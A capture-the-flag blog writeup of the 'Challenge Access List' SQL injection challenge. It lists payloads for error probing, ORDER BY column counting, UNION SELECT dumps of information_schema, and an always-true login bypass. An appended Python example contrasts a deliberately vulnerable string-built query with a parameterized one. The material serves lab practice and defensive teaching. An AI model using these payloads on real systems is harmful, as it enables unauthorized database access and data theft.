EAkl Blog

CTF ringzer0ctf — Challenge Access List


Last updated 2 years ago

Writeup of the SQLi challenge "Challenge Access List"

Let's continue our writeups about challenges in the SQL injection category.

In this challenge, after opening the link you will see an access list: you select a username and the system returns some information about the selected username.

Open the page source and you will notice that this data is sent in a POST request.

So let's use Burp Suite to intercept the traffic and edit the username parameter with the injection payload admin'. You will get a SQL error, so it's an error-based SQL injection. Let's count the number of columns with:

username = admin' order by 1-- - → true

username = admin' order by 2-- - → true

username = admin' order by 3-- - → true

username = admin' order by 4-- - → false

So the number of columns is 3.

The next payload shows which columns are vulnerable:

username = -admin' union select 1,2,3-- -

All 3 columns are vulnerable.

Let's dump the database manually using any of the columns; you can also use sqlmap to automate the process.

username = admin' union select table_name,2,3 from information_schema.tables-- - → get table names

username = admin' union select column_name,2,3 from information_schema.columns where table_name="table name"-- - → get column names

You will get many columns and tables, and in this step you dump the information from each column to get the flag. I prefer to use sqlmap in this step.

Instead of this process, you can try another injection payload like this:

username = admin' or 'a'='a' -- -

Nice, nice! We found it ❤
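Every payload above works because the username value is pasted into the SQL text. The following added example (not part of the original writeup or the challenge's code) replays those inputs against a string-built query and a parameterized one; the table, columns and rows are constructed, and SQLite stands in for the challenge's database, which the page does not name.

```python
import sqlite3

def make_db():
    # Constructed sample data; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE access_list (username TEXT, role TEXT, note TEXT)")
    db.executemany("INSERT INTO access_list VALUES (?, ?, ?)", [
        ("admin", "administrator", "constructed row"),
        ("guest", "read-only", "constructed row"),
        ("svc", "internal", "constructed row not offered in the list"),
    ])
    return db

def lookup_concatenated(db, username):
    # Vulnerable pattern: the value becomes part of the SQL text, so a quote
    # in it ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT username, role, note FROM access_list "
           "WHERE username = '" + username + "'")
    return db.execute(sql).fetchall()

def lookup_parameterized(db, username):
    # Hardened pattern: the value is bound as data and never parsed as SQL.
    sql = "SELECT username, role, note FROM access_list WHERE username = ?"
    return db.execute(sql, (username,)).fetchall()

def outcome(fn, db, value):
    # Row count, or "sql error" when the database rejects the statement.
    try:
        return len(fn(db, value))
    except sqlite3.Error:
        return "sql error"

# The inputs used in the writeup, plus a normal value for comparison.
INPUTS = [
    "admin",
    "admin'",
    "admin' order by 3-- -",
    "admin' order by 4-- -",
    "-admin' union select 1,2,3-- -",
    "admin' or 'a'='a' -- -",
]

if __name__ == "__main__":
    db = make_db()
    for value in INPUTS:
        print(f"{value!r:38} concatenated={outcome(lookup_concatenated, db, value)!s:10}"
              f" parameterized={outcome(lookup_parameterized, db, value)}")
```

With the bound parameter, each writeup input is compared as a literal username and matches no row, so neither the error signal nor the extra rows appear.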
